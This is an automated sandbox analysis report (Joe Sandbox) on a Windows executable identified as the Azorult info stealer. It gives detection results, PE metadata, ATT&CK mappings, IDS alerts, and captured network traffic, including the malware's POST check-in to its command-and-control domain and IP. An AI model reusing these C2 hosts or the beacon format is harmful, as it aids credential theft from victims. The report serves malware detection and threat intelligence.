Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040B0F7 push 0040B124h; ret	0_2_0040B11C
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040B0F8 push 0040B124h; ret	0_2_0040B11C
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00408080 push 004080B8h; ret	0_2_004080B0
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00408158 push 00408196h; ret	0_2_0040818E
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00408970 push 004089E4h; ret	0_2_004089DC
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00408994 push 004089E4h; ret	0_2_004089DC
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_004089AC push 004089E4h; ret	0_2_004089DC
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00415208 push 0041528Ch; ret	0_2_00415284
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040CA0C push 0040CA3Ch; ret	0_2_0040CA34
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040CA10 push 0040CA3Ch; ret	0_2_0040CA34
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00417AEC push 00417B18h; ret	0_2_00417B10
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00404BC0 push 00404C11h; ret	0_2_00404C09
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040D3C0 push 0040D3ECh; ret	0_2_0040D3E4
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040A3E4 push 0040A410h; ret	0_2_0040A408
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040C390 push 0040C3C0h; ret	0_2_0040C3B8
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040C394 push 0040C3C0h; ret	0_2_0040C3B8
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040A3AC push 0040A3D8h; ret	0_2_0040A3D0
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040DC44 push 0040DCA3h; ret	0_2_0040DC9B
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040DC0C push 0040DC38h; ret	0_2_0040DC30
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0041B417 push ecx; iretd	0_2_0041B427
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040B41E push 0040B44Ch; ret	0_2_0040B444
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040B420 push 0040B44Ch; ret	0_2_0040B444
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040A438 push 0040A464h; ret	0_2_0040A45C
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0041A4F4 push 0041A51Ah; ret	0_2_0041A512
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00414C80 push 00414CACh; ret	0_2_00414CA4
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00409488 push 004094B8h; ret	0_2_004094B0
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0041A4AC push 0041A4E8h; ret	0_2_0041A4E0

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

0_2_00417B1A

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0041303C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041303C
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,	0_2_004111C4
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00414408
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00414408
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0041158C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041158C
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00411590 FindFirstFileW,FindNextFileW,FindClose,	0_2_00411590
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D9C

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

Code function: 0_2_00416740 GetSystemInfo,

0_2_00416740

Source: Oggq2dY6kx.exe, 00000000.00000002.1701669567.000000000066D000.00000004.00000020.00020000.00000000.sdmp, Oggq2dY6kx.exe, 00000000.00000002.1701669567.000000000060E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

0_2_00417B1A

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

Code function: 0_2_00407A34 mov eax, dword ptr fs:[00000030h]

0_2_00407A34

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

Code function: GetLocaleInfoA,

0_2_00404B4C

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

Code function: 0_2_004065CC GetUserNameW,

0_2_004065CC

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

Code function: 0_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,

0_2_00404C15

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Azorult

Source: Yara match	File source: Oggq2dY6kx.exe, type: SAMPLE
Source: Yara match	File source: 0.2.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Oggq2dY6kx.exe PID: 7256, type: MEMORYSTR

Yara detected Azorult Info Stealer

Source: Yara match	File source: Oggq2dY6kx.exe, type: SAMPLE
Source: Yara match	File source: 0.2.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Oggq2dY6kx.exe PID: 7256, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	2 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	1 System Owner/User Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	14 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Oggq2dY6kx.exe	96%	ReversingLabs	Win32.Infostealer.CoinStealer
Oggq2dY6kx.exe	88%	Virustotal		Browse
Oggq2dY6kx.exe	100%	Avira	TR/Crypt.XPACK.Gen
Oggq2dY6kx.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
inglesxyz.shop	104.21.52.219	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
http://inglesxyz.shop/index.php	true	unknown
https://inglesxyz.shop/index.php	true	unknown
http://195.245.112.115/index.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://inglesxyz.shop//Yz	Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://inglesxyz.shop/index.php2Tf	Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://inglesxyz.shop/index.phpll	Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://inglesxyz.shop/M	Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://inglesxyz.shop/	Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://inglesxyz.shop/index.php6N	Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ip-api.com/json	Oggq2dY6kx.exe	false	high
https://inglesxyz.shop/g	Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://dotbit.me/a/	Oggq2dY6kx.exe	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.52.219	inglesxyz.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579276
Start date and time:	2024-12-21 12:06:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 1m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Oggq2dY6kx.exe renamed because original name is a hash value
Original Sample Name:	E3E636DDED2B38EA6FC5710D467C29E9.exe
Detection:	MAL
Classification:	mal100.troj.spyw.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 22 Number of non-executed functions: 53
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	6G8OR42xrB.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.2.8
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	172.67.180.113
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	104.21.91.209
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	172.67.180.113
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	104.21.21.99
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Vidar, Xmrig	Browse	172.67.197.170
	https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/	Get hash	malicious	Unknown	Browse	104.18.95.41
	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm	Browse	104.21.21.99
	B06 Chair + Blocker.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	B06 Chair + Blocker.exe	Get hash	malicious	Unknown	Browse	104.26.0.5

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	104.21.52.219
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	104.21.52.219
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Vidar, Xmrig	Browse	104.21.52.219
	Setup.msi	Get hash	malicious	Unknown	Browse	104.21.52.219
	q9bzWO2X1r.msi	Get hash	malicious	Unknown	Browse	104.21.52.219
	doc00290320092.jse	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.52.219
	Fortexternal.exe	Get hash	malicious	Unknown	Browse	104.21.52.219
	676556be12ac3.vbs	Get hash	malicious	Mint Stealer	Browse	104.21.52.219
	PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.hta	Get hash	malicious	Mint Stealer	Browse	104.21.52.219
	ktyihkdfesf.exe	Get hash	malicious	Vidar	Browse	104.21.52.219

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.303597203842279
TrID:	Win32 Executable (generic) a (10002005/4) 99.81% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	Oggq2dY6kx.exe
File size:	114'688 bytes
MD5:	e3e636dded2b38ea6fc5710d467c29e9
SHA1:	682ac24c96964ebc941e107d2ed1cb1619433508
SHA256:	37a6ebef45b4c6b9a635fb2c1152bdef53db3c6d749824c84d8cfe1e79d6df4d
SHA512:	aed777a27d9507de8583ad68ae807f26abd7bb538651ea6b54ed1b896e81a2285a134a5852661377b98cf85f2197f5cabc3e634036cec9183c8cad7325995c73
SSDEEP:	3072:KExRaX6raoCoCyz6/mqv1JR+yBtGOeheWginBq:faZ1tme+1winw
TLSH:	A5B3196EF7C19277D02408BDCD45A1B9907975302E391822F7E64F6CD8F96C2AA6C2C7
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x41a684
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	6d1f2b41411eacafcf447fc002d8cb00

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0041A51Ch
call 00007F6230C941D1h
mov eax, 0041A6ACh
call 00007F6230CA85CFh
call 00007F6230C928B6h
add bh, bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d000	0x79e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1e000	0x135c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x196b0	0x19800	36cb28728042ffae219a1946fa4be687	False	0.5062327665441176	data	6.185523493326931	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x1b000	0x66c	0x800	e9650bf22ef923968a1214ea2fbd8ce9	False	0.716796875	data	6.268942670866809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x1c000	0x8c5	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x1d000	0x79e	0x800	556c360ee726e003c5e1f6a038e97572	False	0.4248046875	data	4.584408491713284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1e000	0x135c	0x1400	47e0321680a57d86584b7d24879d5e1d	False	0.7943359375	data	6.670961239193358	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, WideCharToMultiByte, MultiByteToWideChar, GetThreadLocale, GetStartupInfoA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	GetModuleHandleA
advapi32.dll	RegOpenKeyExA, RegEnumKeyA, FreeSid
kernel32.dll	WriteFile, Sleep, LocalFree, LoadLibraryExW, LoadLibraryA, GlobalUnlock, GlobalLock, GetTickCount, GetSystemInfo, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetFileAttributesW, GetCurrentProcessId, GetCurrentProcess, FreeLibrary, FindNextFileW, FindFirstFileW, FindClose, ExitProcess, DeleteFileW, CreateDirectoryW, CopyFileW
gdi32.dll	SelectObject, DeleteObject, DeleteDC, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt
user32.dll	ReleaseDC, GetSystemMetrics, GetDC, CharToOemBuffA
ole32.dll	OleInitialize, CoCreateInstance

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-21T12:07:02.118563+0100	2029467	ET MALWARE Win32/AZORult V3.3 Client Checkin M14	1	192.168.2.4	49730	104.21.52.219	80	TCP
2024-12-21T12:07:02.118563+0100	2810276	ETPRO MALWARE AZORult CnC Beacon M1	1	192.168.2.4	49730	104.21.52.219	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 12:07:00.884154081 CET	49730	80	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:01.003731966 CET	80	49730	104.21.52.219	192.168.2.4
Dec 21, 2024 12:07:01.003817081 CET	49730	80	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:01.003994942 CET	49730	80	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:01.123589039 CET	80	49730	104.21.52.219	192.168.2.4
Dec 21, 2024 12:07:02.118379116 CET	80	49730	104.21.52.219	192.168.2.4
Dec 21, 2024 12:07:02.118515968 CET	80	49730	104.21.52.219	192.168.2.4
Dec 21, 2024 12:07:02.118562937 CET	49730	80	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:02.118562937 CET	49730	80	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:02.120595932 CET	49730	80	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:02.120958090 CET	49731	443	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:02.121011972 CET	443	49731	104.21.52.219	192.168.2.4
Dec 21, 2024 12:07:02.121083021 CET	49731	443	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:02.132453918 CET	49731	443	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:02.132482052 CET	443	49731	104.21.52.219	192.168.2.4
Dec 21, 2024 12:07:02.240120888 CET	80	49730	104.21.52.219	192.168.2.4
Dec 21, 2024 12:07:03.354096889 CET	443	49731	104.21.52.219	192.168.2.4
Dec 21, 2024 12:07:03.354228973 CET	49731	443	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:03.411226988 CET	49731	443	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:03.411248922 CET	443	49731	104.21.52.219	192.168.2.4
Dec 21, 2024 12:07:03.411644936 CET	443	49731	104.21.52.219	192.168.2.4
Dec 21, 2024 12:07:03.411705971 CET	49731	443	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:03.415302992 CET	49731	443	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:03.455374956 CET	443	49731	104.21.52.219	192.168.2.4
Dec 21, 2024 12:07:03.790167093 CET	443	49731	104.21.52.219	192.168.2.4
Dec 21, 2024 12:07:03.790236950 CET	443	49731	104.21.52.219	192.168.2.4
Dec 21, 2024 12:07:03.790256023 CET	49731	443	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:03.790296078 CET	49731	443	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:03.791241884 CET	49731	443	192.168.2.4	104.21.52.219
Dec 21, 2024 12:07:03.791268110 CET	443	49731	104.21.52.219	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 12:07:00.566895962 CET	57986	53	192.168.2.4	1.1.1.1
Dec 21, 2024 12:07:00.878288031 CET	53	57986	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 21, 2024 12:07:00.566895962 CET	192.168.2.4	1.1.1.1	0x30df	Standard query (0)	inglesxyz.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 21, 2024 12:07:00.878288031 CET	1.1.1.1	192.168.2.4	0x30df	No error (0)	inglesxyz.shop		104.21.52.219	A (IP address)	IN (0x0001)	false
Dec 21, 2024 12:07:00.878288031 CET	1.1.1.1	192.168.2.4	0x30df	No error (0)	inglesxyz.shop		172.67.204.92	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

inglesxyz.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.52.219	80	7256	C:\Users\user\Desktop\Oggq2dY6kx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 12:07:01.003994942 CET	268	OUT	POST /index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: inglesxyz.shop Content-Length: 107 Cache-Control: no-cache Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 66 8b 30 6c eb 42 70 9d 36 70 9d 32 70 9d 30 70 9d 30 70 9c 47 13 8b 30 66 ef 26 66 9b 40 70 9d 30 13 8b 30 61 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10f0lBp6p2p0p0pG0f&f@p00a
Dec 21, 2024 12:07:02.118379116 CET	1031	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 21 Dec 2024 11:07:01 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Sat, 21 Dec 2024 12:07:01 GMT Location: https://inglesxyz.shop/index.php Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nU5RZ2M7YKUsUPoOCAilWgRNsDaMg%2F6%2FnqGT1VLaNTyZ3tW3cq18ixdGjw6RDJ%2FYCQh%2FlZ0kbpdD0N0JkvkqRGQEbGbazLYU62%2FTzYJ1hokBVCnmPXeW%2FIcdg16zhxABgg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5767f918167287-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1986&rtt_var=993&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=268&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	104.21.52.219	443	7256	C:\Users\user\Desktop\Oggq2dY6kx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 11:07:03 UTC	163	OUT	GET /index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Cache-Control: no-cache Host: inglesxyz.shop Connection: Keep-Alive
